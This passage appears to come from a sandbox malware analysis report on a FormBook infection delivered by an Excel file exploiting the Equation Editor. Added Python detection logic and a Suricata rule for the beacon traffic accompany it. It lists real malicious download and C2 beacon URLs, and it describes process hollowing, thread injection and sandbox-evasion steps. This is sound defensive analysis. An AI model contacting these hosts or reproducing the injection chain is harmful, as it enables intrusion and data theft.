          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wininit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\Pcportk28.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\Pcportk28.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780 Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 836 Thread sleep time: -34932s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe TID: 672 Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe Last function: Thread delayed
          Source: C:\Users\Public\Pcportk28.exe Code function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\Pcportk28.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Pcportk28.exe Process information queried: ProcessInformation
          Source: C:\Users\Public\Pcportk28.exe Thread delayed: delay time: 34932
          Source: C:\Users\Public\Pcportk28.exe Thread delayed: delay time: 922337203685477
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp Binary or memory string: +Qemu
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\Pcportk28.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: Debug
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Pcportk28.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPort
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe | Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe | Network Connect: 162.0.209.73 80
Source: C:\Windows\explorer.exe | Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe | Network Connect: 118.67.131.217 80
Source: C:\Windows\explorer.exe | Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe | Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe | Network Connect: 216.239.34.21 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Sample uses process hollowing technique
Source: C:\Users\Public\Pcportk28.exe | Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\Pcportk28.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\Pcportk28.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Users\Public\Pcportk28.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wininit.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\Pcportk28.exe | Memory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\Pcportk28.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\Pcportk28.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\wininit.exe | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Users\Public\Pcportk28.exe | Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
(Read together, these records describe the chain: EQNEDT32.EXE starts the dropped C:\Users\Public\Pcportk28.exe; that first instance, the .NET loader, spawns a second copy of itself and overwrites the copy's image at 0x400000 with a file beginning 4D5A, which is the unpacked native payload that the FormBook Yara rules match at 5.x.Pcportk28.exe.400000; the second instance maps execute-read-write sections into explorer.exe and queues an APC there; explorer.exe starts a 32-bit wininit.exe from SysWOW64 (see the behaviour graph), whose original image is unmapped at base 0x6F0000 and replaced through execute-read-write sections; the hollowed wininit.exe sets a thread context in process 1764 and finally runs cmd.exe /c del to remove the dropper from disk. A wininit.exe running from SysWOW64 with explorer.exe as parent is itself anomalous: the legitimate one lives in System32 and is started by smss.exe at boot.)
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\Public\Pcportk28.exe | Queries volume information: C:\Users\Public\Pcportk28.exe VolumeInformation
Source: C:\Users\Public\Pcportk28.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\Pcportk28.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
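Detection logic for the process chain recorded in this section, run over a constructed set of Sysmon-style events. This is an added example for this write-up, not a Joe Sandbox or Sigma artifact; image paths, parent relationships, destination addresses and the cmd.exe command line are taken from the report, while the PIDs, the event schema and the two benign control events are made up for the example. It flags the five behaviours the report's signatures describe: a child of the Equation Editor, execution from C:\Users\Public, a wininit.exe that is not the boot-time one from System32 under smss.exe, a cmd.exe deleting an image that ran from a user-writable directory, and network activity from processes that have no business on the network.

```python
"""Process-chain rules for the EQNEDT32 -> dropper -> explorer.exe -> wininit.exe chain.

Added example; constructed events, illustrative PIDs.
"""
from collections import Counter, namedtuple

Event = namedtuple("Event", "kind pid ppid image parent_image cmdline dst")


def ev(kind, pid, ppid, image, parent_image="", cmdline="", dst=""):
    return Event(kind, pid, ppid, image, parent_image, cmdline, dst)


EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\Public\Pcportk28.exe"
EXPLORER = r"C:\Windows\explorer.exe"
WININIT32 = r"C:\Windows\SysWOW64\wininit.exe"

# Constructed telemetry mirroring the report's records (PIDs 101..106 are illustrative).
EVENTS = [
    ev("network_connect", 101, 0, EQN, dst="131.153.37.4:443"),          # fetch of i4L.exe
    ev("process_create", 102, 101, DROPPER, EQN, cmdline=DROPPER),        # EQNEDT32 starts dropper
    ev("process_create", 103, 102, DROPPER, DROPPER, cmdline=DROPPER),    # dropper spawns itself
    ev("network_connect", 104, 0, EXPLORER, dst="162.0.209.73:80"),       # injected explorer beacons
    ev("network_connect", 104, 0, EXPLORER, dst="118.67.131.217:80"),
    ev("process_create", 105, 104, WININIT32, EXPLORER, cmdline="wininit.exe"),
    ev("process_create", 106, 105, r"C:\Windows\SysWOW64\cmd.exe", WININIT32,
       cmdline=r'/c del "C:\Users\Public\Pcportk28.exe"'),
    # Benign controls that must not fire: the real wininit.exe at boot and a browser.
    ev("process_create", 200, 199, r"C:\Windows\System32\wininit.exe",
       r"C:\Windows\System32\smss.exe", cmdline="wininit.exe"),
    ev("network_connect", 201, 0, r"C:\Program Files\Mozilla Firefox\firefox.exe",
       dst="203.0.113.10:443"),
]

SYSTEM32 = "c:\\windows\\system32\\"
USER_WRITABLE = ("c:\\users\\public\\",)          # extend with %TEMP%, %APPDATA% as needed
NO_NETWORK_EXPECTED = {"eqnedt32.exe", "explorer.exe", "wininit.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) tuples for the behaviours listed in this section."""
    findings = []
    # Images that ran from a user-writable directory; a later "del" of one of them
    # is the dropper cleaning up after itself.
    user_images = {e.image.lower() for e in events
                   if e.kind == "process_create" and e.image.lower().startswith(USER_WRITABLE)}
    for e in events:
        img, parent, path = basename(e.image), basename(e.parent_image), e.image.lower()
        if e.kind == "process_create":
            if parent == "eqnedt32.exe":
                findings.append(("equation_editor_spawn", e.pid, e.image))
            if path.startswith(USER_WRITABLE):
                findings.append(("exec_from_public_dir", e.pid, e.image))
            if img == "wininit.exe" and not (parent == "smss.exe" and path.startswith(SYSTEM32)):
                findings.append(("wininit_out_of_place", e.pid, f"{e.image} <- {e.parent_image}"))
            if img == "cmd.exe" and "del" in e.cmdline.lower().split() \
                    and any(u in e.cmdline.lower() for u in user_images):
                findings.append(("self_delete", e.pid, e.cmdline))
        elif e.kind == "network_connect" and img in NO_NETWORK_EXPECTED:
            findings.append(("unexpected_network", e.pid, f"{img} -> {e.dst}"))
    return findings


def rule_counts(events):
    """Number of hits per rule, as a plain dict."""
    return dict(Counter(rule for rule, _, _ in detect(events)))


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:24} pid={pid} {detail}")
```

The wininit.exe rule is the one worth carrying into production as written: the boot-time wininit.exe has smss.exe as parent and lives in System32, so any other combination is either hollowing, as here, or a masquerading copy. The Equation Editor rule needs no tuning because EQNEDT32.EXE has no legitimate reason to create processes at all.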

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File sources: the same nine unpacked PE files and eleven memory dumps listed under Stealing of Sensitive Information above (processes 4 and 5 are the two Pcportk28.exe instances, 6 is explorer.exe and 7 is wininit.exe).

Mitre Att&ck Matrix

Techniques with matching signatures, grouped by tactic. The bracketed digits are reproduced exactly as printed in the original matrix cells; the unmatched techniques that make up the rest of the static matrix (Initial Access, Credential Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects and Impact had no matches) are omitted.

Execution: Shared Modules [1]; Exploitation for Client Execution [13]
Persistence: DLL Side-Loading [1]
Privilege Escalation: Process Injection [612]; DLL Side-Loading [1]
Defense Evasion: Masquerading [111]; Modify Registry [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [23]; DLL Side-Loading [1]
Discovery: Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [113]
Collection: Archive Collected Data [1]
Command and Control: Encrypted Channel [11]; Ingress Tool Transfer [4]; Non-Application Layer Protocol [3]; Application Layer Protocol [114]

Behavior Graph

Behavior Graph ID: 553293, sample SWIFT - Copy - Copy.xlsx, start date 14/01/2022, architecture Windows, score 100. Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures. The rendered graph is reproduced here as the process chain it draws:

EXCEL.EXE (started)
  drops C:\Users\user\...\~$SWIFT - Copy - Copy.xlsx (data)
EQNEDT32.EXE (started)
  connects to mikeloayza.com 131.153.37.4:443 (local ports 49167, 49168; SSASN2US, United States)
  drops C:\Users\user\AppData\Local\...\i4L[1].exe (PE32)
  drops C:\Users\Public\Pcportk28.exe (PE32)
  signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  starts Pcportk28.exe
    signatures: Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    starts Pcportk28.exe (second instance)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injects into explorer.exe
        connects to www.luckyfandom.com 118.67.131.217:80 (local port 49173; CLEAR-AS-APClearNetworksPtyLtdAU, Korea Republic of); bitcointradel.com 162.0.209.73:80 (local port 49171; ACPCA, Canada); 5 other IPs or domains
        signature: System process connects to network (likely due to code injection or exploit)
        starts wininit.exe
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          starts cmd.exe

The chain depends on EQNEDT32.EXE being present and exploitable; the analysis image runs Office 2010 SP1, and Microsoft removed the Equation Editor from Office in the January 2018 security updates, so on a patched installation the chain stops at EXCEL.EXE and the download from mikeloayza.com never happens.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
SWIFT - Copy - Copy.xlsx | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\Pcportk28.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.Pcportk28.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.Pcportk28.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.Pcportk28.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.Pcportk28.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
mikeloayza.com | 3% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://mikeloayza.com/E9/i4L.exe | 100% | Avira URL Cloud | malware
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
www.healingandhealthy.com/i6ro/ | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
https://mikeloayza.com/E9/i4L.exe | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.luckyfandom.com | 118.67.131.217 | true | true | | unknown
mikeloayza.com | 131.153.37.4 | true | true | | unknown
bitcointradel.com | 162.0.209.73 | true | true | | unknown
executive-air.net | 34.102.136.180 | true | false | | unknown
www.fisioletsgo.com | 216.239.34.21 | true | false | | unknown
www.executive-air.net | unknown | unknown | true | | unknown
www.bitcointradel.com | unknown | unknown | true | | unknown
www.freeadakahamazon.com | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://mikeloayza.com/E9/i4L.exe | true | Avira URL Cloud: malware | unknown
http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p | true | Avira URL Cloud: safe | unknown
http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p | false | Avira URL Cloud: safe | unknown
http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p | true | Avira URL Cloud: safe | unknown
www.healingandhealthy.com/i6ro/ | true | Avira URL Cloud: safe | low
http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p | false | Avira URL Cloud: safe | unknown
https://mikeloayza.com/E9/i4L.exe | true | Avira URL Cloud: malware | unknown

Only the two download URLs for i4L.exe carry a malware verdict; every beacon URL is rated "safe" by URL reputation. What identifies the beacons is their shape, not their reputation: all of them use the same path /i6ro/, the same two query parameter names 1bwlC and Lvkth in the same order, and the same second value 7nk0PH684p, with only the first value differing per host. www.freeadakahamazon.com, queried by explorer.exe but never connected to, belongs to the same set. Blocking should therefore be driven by that request template and by the process making the request (explorer.exe has no reason to make these GETs), not by per-domain reputation.
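The request template the beacon URLs above share, derived programmatically and turned into a matcher and an IDS rule. This is an added example for this write-up, not code from the sample or from Joe Sandbox; the URLs are the ones the sandbox recorded, and the Suricata rule text and its sid are this example's own (Suricata 5+ keyword syntax, to be validated with suricata -T before use). The template derivation is general: it works for any set of URLs that share one path and one parameter sequence, and it records every parameter whose value is constant across the set.

```python
"""Derive the shared beacon template from the recorded C2 URLs and emit detection artifacts.

Added example; URLs from the report, rule text and sid are this example's own.
"""
from urllib.parse import urlsplit

BEACON_URLS = [
    "http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p",
    "http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p",
    "http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p",
    "http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p",
]
# The stage-two download and the path-only URL from memory, for contrast.
OTHER_URLS = ["http://mikeloayza.com/E9/i4L.exe", "www.healingandhealthy.com/i6ro/"]


def parse_url(url):
    """(host, path, [(key, value), ...]) keeping the query verbatim: parse_qsl would
    turn the '+' inside the base64-like values into spaces, which we do not want."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    query = []
    for pair in (parts.query.split("&") if parts.query else []):
        key, _, value = pair.partition("=")
        query.append((key, value))
    return parts.hostname, parts.path, query


def beacon_template(urls):
    """Common path, ordered parameter names, and any parameter whose value never changes."""
    parsed = [parse_url(u) for u in urls]
    paths = {p for _, p, _ in parsed}
    key_seqs = {tuple(k for k, _ in q) for _, _, q in parsed}
    if len(paths) != 1 or len(key_seqs) != 1:
        raise ValueError("URLs do not share one path and one parameter sequence")
    keys = key_seqs.pop()
    constant = {}
    for i, k in enumerate(keys):
        values = {q[i][1] for _, _, q in parsed}
        if len(values) == 1:
            constant[k] = values.pop()
    return {"path": paths.pop(), "keys": keys, "constant": constant}


def is_beacon(url, tmpl):
    """Full template match: path, parameter names in order, constant values present."""
    _, path, query = parse_url(url)
    if path != tmpl["path"] or tuple(k for k, _ in query) != tmpl["keys"]:
        return False
    q = dict(query)
    return all(q.get(k) == v for k, v in tmpl["constant"].items())


def hosts_sharing_path(urls, tmpl):
    """Hosts that use the campaign path even without a full query (block-list input)."""
    return sorted({h for h, p, _ in map(parse_url, urls) if p == tmpl["path"]})


def suricata_rule(tmpl, sid=1000001):
    """One rule on the normalized URI buffer: path plus first key anchored at the start,
    each further key (with its constant value, when there is one) in order after it."""
    first, rest = tmpl["keys"][0], tmpl["keys"][1:]
    uri = [f'content:"{tmpl["path"]}?{first}="; startswith;']
    for k in rest:
        uri.append(f'content:"&{k}={tmpl["constant"].get(k, "")}"; distance:0;')
    return ("alert http $HOME_NET any -> $EXTERNAL_NET any "
            f'(msg:"FormBook beacon {tmpl["path"]}"; flow:established,to_server; '
            'http.method; content:"GET"; http.uri; ' + " ".join(uri) +
            f" classtype:trojan-activity; sid:{sid}; rev:1;)")


if __name__ == "__main__":
    tmpl = beacon_template(BEACON_URLS)
    print(tmpl)
    print(hosts_sharing_path(BEACON_URLS + OTHER_URLS, tmpl))
    print(suricata_rule(tmpl))
```

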